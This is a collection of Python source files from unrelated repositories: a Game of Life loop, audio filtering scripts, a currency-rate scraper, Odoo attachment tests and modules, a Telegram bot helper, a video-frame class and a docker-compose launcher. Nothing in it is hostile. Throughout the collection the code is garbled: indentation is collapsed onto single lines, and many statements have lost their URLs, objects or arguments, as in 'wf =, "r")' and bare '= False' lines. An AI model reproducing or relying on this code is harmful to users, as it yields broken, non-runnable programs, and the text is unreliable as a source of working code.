pygame.display.update() while run: if not setting_up: clock.tick(FPS) mx, my = pygame.mouse.get_pos() for event in pygame.event.get(): if event.type == QUIT: pygame.quit() sys.exit() if event.type == KEYDOWN: if event.key == K_g: show_grid = not show_grid if setting_up: if event.type == MOUSEBUTTONDOWN: if event.button == 1: lmousedown = True if event.button == 3: rmousedown = True if event.type == MOUSEBUTTONUP: if event.button == 1: lmousedown = False if event.button == 3: rmousedown = False if event.type == KEYDOWN: if event.key == K_SPACE: setting_up = False if event.key == K_c: for row in cells: for cell in row: = False if lmousedown: try: cells[my//CELL_SIZE][mx//CELL_SIZE].living = True except IndexError: pass if rmousedown: try: cells[my//CELL_SIZE][mx//CELL_SIZE].living = False except IndexError: pass else: if event.type == KEYDOWN: if event.key == K_SPACE: setting_up = True if not setting_up: for row in cells: for cell in row: cell.update() for row in cells: for cell in row: = cell.lives_next_round draw() ```
{ "source": "000ubird/HighResolution", "score": 3 }
#### File: libs/audio/ ```python import wave import numpy #ファイル名を指定し、wavファイルのサンプリング周波数とint型のデータを連想配列で返す def read_wav_cd(fileName) : print("Reading "+fileName) #指定したファイルが見つからなかった時の処理 try : wf =, "r") except FileNotFoundError : print ("ファイル "+fileName+" が見つかりません") exit() fs = wf.getframerate() #サンプリング周波数 N = wf.getnframes() #フレーム数 data = wf.readframes(wf.getnframes()) #int型に変換 data = numpy.frombuffer(data, dtype="int16") / 32768.0 wf.close() return {"data":data, "fs":fs, "N":N} ``` #### File: libs/other/ ```python import struct import wave import numpy as np import scipy.signal from pylab import * """SciPyのFIRフィルタ関数を使うサンプル""" def fft(b, y, fs): """フィルタ係数bとフィルタされた信号yのFFTを求める""" b = list(b) y = list(y) N = 512 # FFTのサンプル数 # 最低でもN点ないとFFTできないので0.0を追加 for i in range(N): b.append(0.0) y.append(0.0) # フィルタ係数のFFT B = np.fft.fft(b[0:N]) freqList = np.fft.fftfreq(N, d=1.0/fs) spectrum = [int(np.sqrt(c.real ** 2 + c.imag ** 2)) for c in B] # フィルタ係数の波形領域 subplot(221) plot(range(0, N), b[0:N]) axis([0, N, -0.5, 0.5]) xlabel("time [sample]") ylabel("amplitude") # フィルタ係数の周波数領域 subplot(223) n = len(freqList) / 2 plot(freqList[:n], spectrum[:n], linestyle='-') axis([0, fs/2, 0, 1.2]) xlabel("frequency [Hz]") ylabel("spectrum") # フィルタされた波形のFFT Y = np.fft.fft(y[0:N]) freqList = int(np.fft.fftfreq(N, d=1.0/fs)) spectrum = [int(np.sqrt(c.real ** 2 + c.imag ** 2)) for c in Y] print(freqList) # 波形を描画 subplot(222) plot(range(0, N), y[0:N]) axis([0, N, -1.0, 1.0]) xlabel("time [sample]") ylabel("amplitude") # 振幅スペクトルを描画 subplot(224) n = len(freqList) / 2 plot(freqList[:n], spectrum[:n], linestyle='-') axis([0, fs/2, 0, 10]) xlabel("frequency [Hz]") ylabel("spectrum") show() def save(data, fs, bit, filename): """波形データをWAVEファイルへ出力""" wf =, "w") wf.setnchannels(2) wf.setsampwidth(2) wf.setframerate(41000) wf.writeframes(data) wf.close() if __name__ == '__main__': wf ="sample.wav", "r") fs = wf.getframerate() x = wf.readframes(wf.getnframes()) x = frombuffer(x, dtype="int16") / 32768.0 nyq = fs / 2.0 # ナイキスト周波数 # フィルタの設計 # ナイキスト周波数が1になるように正規化 fe1 = 50.0 / nyq # カットオフ周波数1 fe2 = 3000.0 / nyq # カットオフ周波数2 numtaps = 255 # フィルタ係数(タップ)の数(要奇数) b = scipy.signal.firwin(numtaps, fe1) # Low-pass #b = scipy.signal.firwin(numtaps, fe2, pass_zero=False) # High-pass # b = scipy.signal.firwin(numtaps, [fe1, fe2], pass_zero=False) # Band-pass # b = scipy.signal.firwin(numtaps, [fe1, fe2]) # Band-stop # FIRフィルタをかける y = scipy.signal.lfilter(b, 1, x) # フィルタ係数とフィルタされた信号のFFTを見る fft(b, y, fs) # 音声バイナリに戻して保存 y = [int(v * 32767.0) for v in y] y = struct.pack("h" * len(y), *y) save(y, fs, 16, "sine2.wav") ``` #### File: HighResolution/src/ ```python import numpy as np import audioread as ar import math import sys, time #ファイル名 wavName_hi = "../wav/02-Are You Real.wav" wavName_cd = "../wav/02-Are You Real_CD.wav" csvName_hi = "../result_hi.csv" csvName_cd = "../result_cd.csv" #取得する振幅値の数 N = 20 #参考: def pcm2float(short_ndary): float_ndary = np.array(short_ndary, dtype=np.float64) return np.where(float_ndary > 0.0, float_ndary / 32767.0, float_ndary / 32768.0) #ファイル名を指定し、wavファイルのサンプリング周波数と振幅値を連想配列で返す def read_wav_cd(wavName,begin,end) : wav_bary = bytearray() with ar.audio_open(wavName) as f: if f.duration*f.samplerate < end-begin: print("サンプル数が音声信号の長さを超えています。") exit() print("ファイル名 : ",wavName,"\nチャネル数: {0}[channel] \nサンプリング周波数 : {1}[Hz]\nフレーム数 : {2}" .format(f.channels, f.samplerate, f.duration*f.samplerate)) # "block_samples"で指定されたチャンクサイズずつ処理する(デフォルト1024) for buf in f: wav_bary.extend(buf) wav_ary = np.frombuffer(wav_bary, dtype=np.int16) # 常時16bitで読み込まれる wav_l = wav_ary[0::2] wav_r = wav_ary[1::2] #print(wav_l.shape) #print(wav_r.shape) # shortをfloat64に変換 wav_float_l = pcm2float(wav_l[begin:end]) #配列が大きいとメモリエラー wav_float_r = pcm2float(wav_r[begin:end]) #読み込んだ波形の一部を描画 #import pylab as pl #pl.plot(wav_float_l[begin:end]) return {"amp_l":wav_float_l, "amp_r":wav_float_r} #指定したフレーム数分だけ振幅値をCSVで出力する def makeAmpCSV(wavData,csvName,begin,end): amps = [[]] #2次元配列の動的確保 result = "" #指定したフレーム部分内の振幅値を取得 i = begin while i < end : #numAmp分だけ振幅値を抽出 for j in range(i,i+N) : amps.append(wavData[j]) #最後の列にはカンマを付けない if j == i+N-1 : result += repr(wavData[j]) else : result += repr(wavData[j])+',' result += '\n' i += N #CSVファイルに格納 try : f = open(csvName,'w') f.write(result) f.close() except : print("CSVファイルの出力中にエラーが発生しました。") exit() return amps #指定したフレーム数分だけ振幅値をCSVで出力する - CD用 def makeAmpCSV2(wavData,csvName,begin,end): result = "" #指定したフレーム部分内の振幅値を取得 i = begin while i < end : #numAmp分だけ振幅値を抽出 for j in range(i,i+N,2) : result += repr(wavData[j])+',' result += repr(wavData[j]) #最後の列にはカンマを付けない if j != i+N-2 : result += ',' result += '\n' i += N #CSVファイルに格納 try : f = open(csvName,'w') f.write(result) f.close() except : print("CSVファイルの出力中にエラーが発生しました。") exit() def makeAmpArrayHi(wavData,begin,end) : #numpyのinsert用ダミーデータ dummy_data = np.zeros(N) array = np.array([dummy_data],dtype=float) tmp_array = np.array([],dtype=float) #指定したフレーム部分内の振幅値を取得 i = 1 #処理する先頭のフレーム数 n = 1 #結果を保持する配列のインデックス m = 0 #N個分の振幅値を保持する配列のインデックス current = 0 while i < end - N : #N個分の配列データを抽出 for j in range(i,i+N) : tmp_array = np.insert(tmp_array, m, wavData[j]) m += 1 #抽出したデータを追加 array = np.insert(array,n,tmp_array,axis=0) #各変数の初期化 tmp_array = np.array([],dtype=float) i += N n += 1 m = 0 #進行度合いの表示 nextP = math.floor(i/end*100) if nextP > current : sys.stdout.write("\r%s" % str(nextP)+"% ") sys.stdout.flush() time.sleep(0.01) current = nextP sys.stdout.write("\r%s" % str(100)+"% ") print("\n作成完了\n") return array def makeAmpArrayCD(wavData,begin,end) : #numpyのinsert用ダミーデータ dummy_data = np.zeros(N) array = np.array([dummy_data],dtype=float) tmp_array = np.array([],dtype=float) #指定したフレーム部分内の振幅値を取得 i = 1 #処理する先頭のフレーム数 n = 1 #結果を保持する配列のインデックス m = 0 #N個分の振幅値を保持する配列のインデックス current = 0 while i < end - N : #N個分の配列データを抽出 for j in range(i,i+N,2) : tmp_array = np.insert(tmp_array, m, wavData[j]) m += 1 tmp_array = np.insert(tmp_array, m, wavData[j]) m += 1 #抽出したデータを追加 array = np.insert(array,n,tmp_array,axis=0) #各変数の初期化 tmp_array = np.array([],dtype=float) i += N n += 1 m = 0 #進行度合いの表示 nextP = math.floor(i/end*100) if nextP > current : sys.stdout.write("\r%s" % str(nextP)+"% ") sys.stdout.flush() time.sleep(0.01) current = nextP sys.stdout.write("\r%s" % str(100)+"% ") print("\n作成完了\n") return array if __name__ == '__main__': #抽出するフレーム数 beginFlame = 0 #固定 endFlame = 1000000 #10000000 #WAVデータの読み込み wav_data_hi = read_wav_cd(wavName_hi,beginFlame,endFlame) #wav_data_cd = read_wav_cd(wavName_cd) a = makeAmpArrayHi(wav_data_hi['amp_l'], beginFlame, endFlame) b = makeAmpArrayCD(wav_data_hi['amp_l'], beginFlame, endFlame) #CSVファイルの出力 #makeAmpCSV(wav_data_hi['amp_l'], csvName_hi,beginFlame,endFlame) #現時点ではハイレゾ音源から擬似CD音源の特徴ベクトルを作成する #makeAmpCSV2(wav_data_hi['amp_l'], csvName_cd,beginFlame,endFlame) #print("CSVファイルを出力しました。") ``` #### File: src/samples/ ```python import numpy as np import matplotlib.pyplot as plt def scale(X): """データ行列Xを属性ごとに標準化したデータを返す""" # 属性の数(=列の数) col = X.shape[1] # 属性ごとに平均値と標準偏差を計算 mu = np.mean(X, axis=0) sigma = np.std(X, axis=0) # 属性ごとデータを標準化 for i in range(col): X[:,i] = (X[:,i] - mu[i]) / sigma[i] return X # faithful.txtデータをロード data = np.genfromtxt("faithful.txt") X_train = scale(data) N = len(X_train) # 散布図をプロット plt.plot(X_train[:, 0], X_train[:, 1], 'gx') plt.xlim(-2.5, 2.5) plt.ylim(-2.5, 2.5) plt.grid() ```
{ "source": "0011010000110010/instant_exchange_conventor", "score": 3 }
#### File: 0011010000110010/instant_exchange_conventor/ ```python import re from requests import get from datetime import datetime from time import sleep from bs4 import BeautifulSoup now = time = datetime.strftime(now, "\n%d-%B-%Y\t%H:%M:%S:%f\n") types = { "dollar": { "name": "DOLAR", "path": "/serbest-piyasa/amerikan-dolari", "tag": "div", "class": "market-data", "regex": "DOLAR(\S+)" }, "pound": { "name": "STERLIN/POUND", "path": "/serbest-piyasa/amerikan-dolari", "tag": "div", "class": "market-data", "regex": "STERLİN(\S+)" }, "gram_gold": { "name": "GRAM GOLD", "path": "/serbest-piyasa/amerikan-dolari", "tag": "div", "class": "market-data", "regex": "ALTIN(\S+)" }, "euro": { "name": "EURO", "path": "/serbest-piyasa/amerikan-dolari", "tag": "div", "class": "market-data", "regex": "EURO(\S+)" } } types_2 = { "bitcoin": { "name": "BITCOIN", "path": "/kripto-paralar/bitcoin", "tag": "ul", "class": "piyasa-ozeti", "regex": "Bitcoin\s+%\s-?[\d,]+\s+\$?([\d\.,]+)" } } def exc_try(): for typ in types: exchangeURL = "" + types[typ]["path"] r = get(exchangeURL) soup = BeautifulSoup(r.content, "html.parser") marketSumForex = soup.find_all("div", {"class": "market-data"}) divs = soup.find_all(types[typ]["tag"], {types[typ]["class"]}) all_texts = divs[-1].text raw_text = all_texts.replace("\n", "") value = re.findall(types[typ]["regex"], raw_text)[0] value_rep = value.replace(".", "").replace(",", ".") value_last = round(float(value_rep), 2) print( f"{decor}\n\tCompared to {types[typ]['name']}\nThe value of it, right now: ₺ {value_last}\n\t\tYou may have {round(amount/(value_last), 4)}") def btc_try(): # dollar exchangeURL = "" + types["dollar"]["path"] r = get(exchangeURL) soup = BeautifulSoup(r.content, "html.parser") marketSumForex = soup.find_all("div", {"class": "market-data"}) divs = soup.find_all(types["dollar"]["tag"], {types["dollar"]["class"]}) all_texts = divs[-1].text raw_text = all_texts.replace("\n", "") value = re.findall(types["dollar"]["regex"], raw_text)[0] value_rep = value.replace(".", "").replace(",", ".") value_last_dollar = round(float(value_rep), 2) # bitcoin exchangeURL = "" + types_2["bitcoin"]["path"] r = get(exchangeURL) soup = BeautifulSoup(r.content, "html.parser") marketSumForex = soup.find_all("div", {"class": "market-data"}) divs = soup.find_all(types_2["bitcoin"]["tag"], { types_2["bitcoin"]["class"]}) all_texts = divs[-1].text raw_text = all_texts.replace("\n", "") value = re.findall(types_2["bitcoin"]["regex"], raw_text)[-1] value_rep = value.replace(".", "").replace(",", ".") value_last_btc = round(float(value_rep), 2) btc_try = value_last_dollar * value_last_btc print( f"{decor}\n\tCompared to {types_2['bitcoin']['name']}\n\t\tYou may have {round(amount/(btc_try), 8)}") if __name__ == '__main__': while True: decor = ("*"*50) msg = "Welcome to Instant Exchange Convertor".center(50, "*") exe = input( f"\n{decor}\n{msg}\n{decor}\nFor starting, type 's'\nFor quitting, type 'q'\nWhat\'s your choice: ") if exe == "s" or exe == "S": amount = round( float(input(f"\nPlease enter an amount (TRY) to invest in: ")), 2) print( f"\nThe exact moment right now is; {time}\nYou have '₺ {amount}' for investing.\nAccording to the instant situation of the markets;") exc_try() btc_try() sleep(60) print("\nRestarting in 10 secs...") sleep(10) elif exe == "q" or exe == "Q": print("\nProgram is shutting down... Open it again whenever you need to.") sleep(10) break else: print("Type error! Please try again with correct letter;") exe ```
{ "source": "001101/misc-addons", "score": 2 }
#### File: ir_attachment_s3/tests/ ```python import logging from odoo import api, exceptions from odoo.tests.common import HttpCase, tagged _logger = logging.getLogger(__name__) @tagged("post_install", "-at_install") class TestResizedAttachments(HttpCase): def setUp(self): super(TestResizedAttachments, self).setUp() self.original_image_url = "" def _get_odoo_image_url(self, model, record_id, field): return "/web/image?model={}&id={}&field={}".format(model, record_id, field) def test_getting_cached_images_url_instead_computing(self): env = api.Environment(self.registry.test_cr, self.uid, {}) env["ir.config_parameter"].set_param("", "s3") if not env["ir.attachment"]._get_s3_resource(): self.skipTest("Bad S3 credidentials given") return product_tmpl = env["product.template"].create( { "name": "Test template", # set the image so that it is not installed from the product (is the white pixel) "image": "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=", } ) product_product = env["product.product"].create( { "name": "Test product", "image_variant": self.original_image_url, "product_tmpl_id":, } ) odoo_image_url = self._get_odoo_image_url( "product.product",, "image" ) odoo_image_medium_url = self._get_odoo_image_url( "product.product",, "image_medium" ) odoo_image_small_url = self._get_odoo_image_url( "product.product",, "image_small" ) self.authenticate("demo", "demo") redirected_image = self.url_open(odoo_image_url, timeout=30) redirected_image_medium = self.url_open(odoo_image_medium_url, timeout=30) redirected_image_small = self.url_open(odoo_image_small_url, timeout=30) self.assertEqual(redirected_image.status_code, 200) self.assertEqual(redirected_image_medium.status_code, 200) self.assertEqual(redirected_image_small.status_code, 200) redirected_image_url = redirected_image.url redirected_image_medium_url = redirected_image_medium.url redirected_image_small_url = redirected_image_small.url # Attachments must be created during the execution of requests that are written above. product_product_image_variant_attachment = env[ "ir.http" ]._find_field_attachment( env, "product.product", "image_variant", ) product_product_image_attachment = env["ir.http"]._find_field_attachment( env, "product.product", "image", ) product_product_image_medium_attachment = env["ir.http"]._find_field_attachment( env, "product.product", "image_medium", ) product_product_image_small_attachment = env["ir.http"]._find_field_attachment( env, "product.product", "image_small", ) a = set( product_product_image_variant_attachment.resized_ids.mapped( "resized_attachment_id" ) ) b = { product_product_image_attachment, product_product_image_medium_attachment, product_product_image_small_attachment, } self.assertFalse(a.difference(b)) self.assertTrue(product_product_image_attachment) self.assertTrue(product_product_image_medium_attachment) self.assertTrue(product_product_image_small_attachment) self.assertEqual(redirected_image_url, product_product_image_attachment.url) self.assertEqual( redirected_image_medium_url, product_product_image_medium_attachment.url ) self.assertEqual( redirected_image_small_url, product_product_image_small_attachment.url ) urls = [ self.original_image_url, redirected_image_url, redirected_image_medium_url, redirected_image_small_url, ] self.assertEqual(len(urls), len(set(urls)), "Duplicates in URLs: %s" % urls) def test_unlink_resized_attachments_when_parent_unlink(self): env = api.Environment(self.registry.test_cr, self.uid, {}) ir_att_model = env["ir.attachment"] ir_att_resized_model = env["ir.attachment.resized"] original_att = ir_att_model.create({"name": "test att"}) resized_att = ir_att_model.create({"name": "resized test att"}) ir_att_resized = ir_att_resized_model.create( {"attachment_id":, "resized_attachment_id":} ) self.assertTrue(original_att.unlink()) with self.assertRaises(exceptions.MissingError): original_att.write({"name": "foo"}) with self.assertRaises(exceptions.MissingError): ir_att_resized.write({"width": 1}) with self.assertRaises(exceptions.MissingError): resized_att.write({"name": "bar"}) ``` #### File: ir_attachment_url/tests/ ```python import logging from odoo.tests.common import HttpCase, tagged _logger = logging.getLogger(__name__) @tagged("post_install", "-at_install") class TestDataGet(HttpCase): def test_data_get(self): test_attachment = self.env.ref("ir_attachment_url.test_url_attachment") self.env["ir.attachment"].search_read( [("id", "=",], ["id", "datas"] ) def test_open_url(self): user_demo = self.env.ref("base.user_demo") url = "/web/image?model=res.users&id={}&field=image_medium".format( self.url_open(url) ``` #### File: ir_attachment_url/tests/ ```python import logging from odoo import api, conf from odoo.tests.common import HttpCase, tagged _logger = logging.getLogger(__name__) @tagged("post_install", "-at_install") class TestProductTmplImage(HttpCase): def _get_original_image_url(self, px=1024): return "{}px-Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg".format( px ) def _get_odoo_image_url(self, model, record_id, field): return "/web/image?model={}&id={}&field={}".format(model, record_id, field) def test_getting_product_variant_image_fields_urls(self): assert ( "ir_attachment_url" in conf.server_wide_modules ), "ir_attachment_url is not in server_wide_modules. Please add it via --load parameter" env = api.Environment(self.registry.test_cr, self.uid, {}) env["ir.config_parameter"].set_param("", "url") product_tmpl = env["product.template"].create( { "name": "Test template", "image": self._get_original_image_url(1024), "image_medium": self._get_original_image_url(128), "image_small": self._get_original_image_url(64), } ) product_product = env["product.product"].create( { "name": "<NAME>", "image": False, "image_medium": False, "image_small": False, "product_tmpl_id":, } ) odoo_image_url = self._get_odoo_image_url( "product.product",, "image" ) odoo_image_medium_url = self._get_odoo_image_url( "product.product",, "image_medium" ) odoo_image_small_url = self._get_odoo_image_url( "product.product",, "image_small" ) product_tmpl_image_attachment = env["ir.http"].find_field_attachment( env, "product.template", "image", product_tmpl ) product_tmpl_image_medium_attachment = env["ir.http"].find_field_attachment( env, "product.template", "image_medium", product_tmpl ) product_tmpl_image_small_attachment = env["ir.http"].find_field_attachment( env, "product.template", "image_small", product_tmpl ) self.assertTrue(product_tmpl_image_attachment) self.assertTrue(product_tmpl_image_medium_attachment) self.assertTrue(product_tmpl_image_small_attachment) self.authenticate("demo", "demo") self.assertEqual( self.url_open(odoo_image_url).url, product_tmpl_image_attachment.url ) self.assertEqual( self.url_open(odoo_image_medium_url).url, product_tmpl_image_medium_attachment.url, ) self.assertEqual( self.url_open(odoo_image_small_url).url, product_tmpl_image_small_attachment.url, ) ``` #### File: web_debranding/models/ ```python from odoo import models class IrActionsActWindowDebranding(models.Model): _inherit = "ir.actions.act_window" def read(self, fields=None, load="_classic_read"): results = super(IrActionsActWindowDebranding, self).read( fields=fields, load=load ) if not fields or "help" in fields: params = self.env["ir.config_parameter"].get_debranding_parameters() new_name = params.get("web_debranding.new_name") for res in results: if isinstance(res, dict) and res.get("help"): res["help"] = res["help"].replace("Odoo", new_name) return results ``` #### File: web_debranding/models/ ```python import logging from odoo import api, models from import mute_logger from .ir_translation import debrand _logger = logging.getLogger(__name__) MODULE = "_web_debranding" class View(models.Model): _inherit = "ir.ui.view" def read_combined(self, fields=None): res = super(View, self).read_combined(fields=fields) res["arch"] = debrand(self.env, res["arch"], is_code=True) return res @api.model def _create_debranding_views(self): """Create UI views that may work only in one Odoo edition""" # Odoo EE self._create_view( "webclient_bootstrap_enterprise_mobile_icon", "web_enterprise.webclient_bootstrap", """ <xpath expr="//link[@rel='icon']" position="replace"> <t t-set="icon" t-value="request and request.env['ir.config_parameter'].get_debranding_parameters().get('web_debranding.icon_url', '')"/> <t t-if="icon"> <link rel="icon" sizes="192x192" t-att-href="icon" type="image/x-icon"/> </t> </xpath>""", ) # Odoo EE self._create_view( "webclient_bootstrap_enterprise_apple_touch_icon", "web_enterprise.webclient_bootstrap", """ <xpath expr="//link[@rel='apple-touch-icon']" position="replace"> <t t-if="icon"> <link rel="apple-touch-icon" t-att-href="icon" type="image/x-icon"/> </t> </xpath>""", ) # Odoo EE self._create_view( "webclient_bootstrap_enterprise_windows_phone", "web_enterprise.webclient_bootstrap", """ <xpath expr="//meta[@name='msapplication-TileImage']" position="replace"> <t t-if="icon"> <meta name="msapplication-TileImage" t-att-content="icon"/> </t> </xpath>""", ) @api.model def _create_view(self, name, inherit_id, arch, noupdate=False, view_type="qweb"): view = self.env.ref("{}.{}".format(MODULE, name), raise_if_not_found=False) if view: try: view.write({"arch": arch}) view._check_xml() except Exception: _logger.warning( "Cannot update view %s. Delete it.", name, exc_info=True ) view.unlink() return return try: with, mute_logger("odoo.models"): view = self.env["ir.ui.view"].create( { "name": name, "type": view_type, "arch": arch, "inherit_id": self.env.ref( inherit_id, raise_if_not_found=True ).id, } ) view._check_xml() except Exception: _logger.debug("Cannot create view %s. Cancel.", name, exc_info=True) return self.env[""].create( { "name": name, "model": "ir.ui.view", "module": MODULE, "res_id":, "noupdate": noupdate, } ) return ``` #### File: web_debranding/models/ ```python from odoo import fields, models class ResUsers(models.Model): _inherit = "res.users" odoobot_state = fields.Selection(string="Bot Status") def is_admin(self): # By default Python functions starting with _ are considered private methods. # Private methods (such as _is_admin) cannot be called remotely return self._is_admin() ```
{ "source": "00111/pelegram", "score": 2 }
#### File: pelegram/django_pelegram/ ```python from django.http import JsonResponse from django.conf import settings import requests import re class Request(object): def __init__(self, payload): self.payload = payload if 'message' in self.payload.keys(): = self.message_request() elif 'edited_message' in self.payload.keys(): = self.edited_message_request() elif 'callback_query' in self.payload.keys(): = self.callback_query_request() def callback_query_request(self): data = { 'text': self.payload['callback_query']['data'], 'chat_id': self.payload['callback_query']['message']['chat']['id'], 'callback_query_id': self.payload['callback_query']['id'], 'user': self.payload['callback_query']['from']['id'], 'type': 'callback_query', 'testing_request': True if 'testing_request' in self.payload.keys() else False, 'message_id': self.payload['callback_query']['message']['message_id'] } return data def message_request(self): data = { 'text': self.payload['message']['text'], 'chat_id': self.payload['message']['chat']['id'], 'user': self.payload['message']['from']['id'], 'type': 'message', 'testing_request': True if 'testing_request' in self.payload.keys() else False } return data def edited_message_request(self): data = { 'text': self.payload['edited_message']['text'], 'chat_id': self.payload['edited_message']['chat']['id'], 'user': self.payload['edited_message']['from']['id'], 'type': 'edited_message', 'testing_request': True if 'testing_request' in self.payload.keys() else False } return data class BotBasic(object): def __init__(self, payload=None, bot_token=None): self.bot_token = bot_token self.request = Request(payload) self.answer = {} def get_command(self, parse_text=''): parse_string =['text'] if parse_text == '' else parse_text re_command = re.match(r'^/\w+', parse_string) command = "" if re_command: command ='/', '') return command def dont_understand_message(self): return "Bot don't understand your command ¯\_(ツ)_/" def json_response(self, data, status=200): return JsonResponse(data, status=status) def exception_template(self, err): return "Run-time error:\n{0}\n\nDELETE THIS OUTPUT FROM PRODUCTION!\n".format(err) def telegram_request(self, method, **kwargs): telegram_url = "{0}/bot{1}/".format(settings.TELEGRAM_API_URL, self.bot_token) telegram_response = + method, **kwargs) return telegram_response def answer_on_callback_query(self): if['type'] == 'callback_query': if 'answer_callback' in self.answer: answer_callback_query_data = dict(['callback_query_id'], **self.answer['answer_callback']) else: answer_callback_query_data = dict(['callback_query_id'], text="Bot is typing") response = self.telegram_request("answerCallbackQuery", data=answer_callback_query_data) else: response = None return response def send_answer(self): answer_callback_response = self.answer_on_callback_query() if answer_callback_response is None: answer_responses = {} else: answer_responses = {"answer_callback": answer_callback_response} messages_response = [] for message in self.answer['messages']: response = self.processing_message_action(message) messages_response.append(response) answer_responses['messages'] = messages_response return answer_responses def processing_message_action(self, message): handled_message = {'data': {}} for key in message['data'].keys(): if key == 'file': handled_message['files'] = {'photo': open(['file'], 'rb')} else: handled_message['data'][key] = message['data'][key] send_message_data = dict(['chat_id'], **handled_message['data']) if 'files' in handled_message.keys(): response = self.telegram_request(message['action'], data=send_message_data, files=handled_message['files']) else: response = self.telegram_request(message['action'], data=send_message_data) return response ```
{ "source": "001honi/video-processing", "score": 3 }
#### File: video-processing/homework-3/ ```python import numpy as np import cv2 class Video(): FONT = cv2.FONT_HERSHEY_SIMPLEX BLUE = (255,0,0) GREEN= (0,255,0) RED = (0,0,255) def __init__(self,path): self.path = path self.frames_inp = [] self.frames_out = [] self.total_frame = None self.shape = (None,None) # H,W def read_frames(self,gray=False,rescale=0): """ stores all the frames in the given video source in self.frames_inp (list) as [frame0, frame1, ...] where frame# is numpy array """ try: source = cv2.VideoCapture(self.path) prop = cv2.CAP_PROP_FRAME_COUNT self.total_frame = int(source.get(prop)) except: print("Error in Path or Frame Count") exit() for i in range(self.total_frame): ret, frame = if not (ret or frame): print("Error in Frame Read") break if gray: frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) if not self.shape[0]: self.shape = frame.shape[:2] if rescale: W = int(self.shape[1] * rescale / 100) H = int(self.shape[0] * rescale / 100) frame = cv2.resize(frame, (W,H), interpolation=cv2.INTER_AREA) self.frames_inp.append(frame) print("[INFO] Video Import Completed") def write(self, path="out.avi",fps=30,gray2bgr=False): H = self.frames_out[0].shape[0] W = self.frames_out[0].shape[1] # fourcc = cv2.VideoWriter_fourcc(*"MJPG") fourcc = -1 # for Windows machines writer = cv2.VideoWriter(path,fourcc,fps,(W,H),True) for frame in self.frames_out: if gray2bgr: frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2BGR) writer.write(frame) print("[INFO] Video Export Completed") ```
{ "source": "001zwzwzw/dagar-avoidance", "score": 2 }
#### File: dagar-avoidance/docker/ ```python import argparse import os import shutil import subprocess def main(args): checkArgs(args) runGlobalPrerequisites() workingDir = findWorkingDir(args) if buildContainers(args, workingDir) runContainers(args, workingDir) elif args.stop: stopContainers(workingDir) elif buildContainers(args, workingDir) elif args.rebuild: rebuildContainers(args, workingDir) else: runContainers(args, workingDir) def createArgsParser(): parser = argparse.ArgumentParser() parser.add_argument("planner", help="the planner to start (local | global)") addRunModes(parser) addRunCommands(parser) return parser.parse_args() def addRunModes(parser): runMode = parser.add_mutually_exclusive_group() runMode.add_argument("--sim", help="run in gazebo", action="store_true") runMode.add_argument("--prod-debug", help="deploy in debug mode, allowing an external machine to connect to the ROS network through VPN (useful for plotting topics in rviz while running on the drone)", action="store_true") runMode.add_argument("--prod-release", help="deploy in release mode", action="store_true") def addRunCommands(parser): runCommands = parser.add_mutually_exclusive_group() runCommands.add_argument("--run", help="build and run the containers", action="store_true") runCommands.add_argument("--run-only", help="run the containers (this is the default)", action="store_true") runCommands.add_argument("--stop", help="stop the containers, if running", action="store_true") runCommands.add_argument("--build", help="build the containers if necessary (internally running `docker-compose build`)", action="store_true") runCommands.add_argument("--rebuild", help="rebuild the containers from scratch (internally running `docker-compose build --no-cache`)", action="store_true") def checkArgs(args): if args.planner != "local" and args.planner != "global": print("Planner has to be \"local\" or \"global\"!") exit(1) def runGlobalPrerequisites(): while isDockerComposeNotInstalled(): installDockerCompose() def isDockerComposeNotInstalled(): return shutil.which("docker-compose") == '' def installDockerCompose(): print("You need to install docker-compose in order to run this script. From another terminal, follow these instructions:") if os.path.exists("/usr/local/bin"): installPath = "/usr/local/bin" else: installPath = "/usr/bin" sysname = os.uname().sysname machine = os.uname().machine remotePath = "{}-{}".format(sysname, machine) curlCommand = "sudo curl -L {} -o {}/docker-compose".format(remotePath, installPath) print() print(" 1. Run: $ {}".format(curlCommand)) print(" 2. Run: $ sudo chmod +x {}/docker-compose".format(installPath)) print() input("When finished, press any key to continue...\n") def findWorkingDir(args): if args.prod_release: return "./{}_planner/{}-planner-prod/{}-planner-prod-release".format(args.planner, args.planner, args.planner) elif args.prod_debug: return "./{}_planner/{}-planner-prod/{}-planner-prod-debug".format(args.planner, args.planner, args.planner) else: return "./{}_planner/{}-planner-dev".format(args.planner, args.planner) def runContainers(args, workingDir): if args.prod_release: print("Deploying {}_planner in RELEASE mode".format(args.planner)) elif args.prod_debug: print("Deploying {}_planner in DEBUG mode".format(args.planner)) else: print("Running simulation for planner {}".format(args.planner))"{}/".format(workingDir), shell=True) def stopContainers(workingDir):"docker-compose -f {}/docker-compose.yml down".format(workingDir), shell=True) def buildContainers(args, workingDir):"docker-compose -f ./components/components.yml build mavros", shell=True)"docker-compose -f {}/docker-compose.yml build".format(workingDir), shell=True) if not args.prod_release and not args.prod_debug:"docker-compose -f ./components/components.yml build sitl-avoidance-server", shell=True) def rebuildContainers(args, workingDir):"docker-compose -f ./components/components.yml build --no-cache mavros", shell=True)"docker-compose -f {}/docker-compose.yml build --no-cache".format(workingDir), shell=True) if not args.prod_release and not args.prod_debug:"docker-compose -f ./components/components.yml build --no-cache sitl-avoidance-server", shell=True) if __name__ == '__main__': args = createArgsParser() main(args) ```
{ "source": "003userye/003-", "score": 2 }
